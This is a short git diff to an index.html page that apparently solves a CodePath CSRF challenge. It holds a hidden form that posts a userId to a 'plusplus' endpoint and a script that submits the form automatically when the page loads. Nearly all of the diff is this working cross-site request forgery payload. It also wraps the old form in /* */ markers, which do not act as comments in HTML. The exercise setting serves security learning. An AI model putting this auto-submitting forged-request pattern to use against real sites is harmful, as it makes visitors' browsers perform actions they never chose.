--- a/index.html
+++ b/index.html
@@ -1,6 +1,12 @@
+/*
 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
  <input type="hidden" name="userId" value="0bd2f88aab5e1900a79a59bf43329f83d64a22ae" />
 </form>
 <script>
  document.csrfForm.submit();
 </script>
+*/
+<form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
+   <input type="hidden" name="userId" value="0da0417b6bb930e2382ff25c3551f89fdf22a336" />
+</form>
+<script> document.csrfForm.submit(); </script>
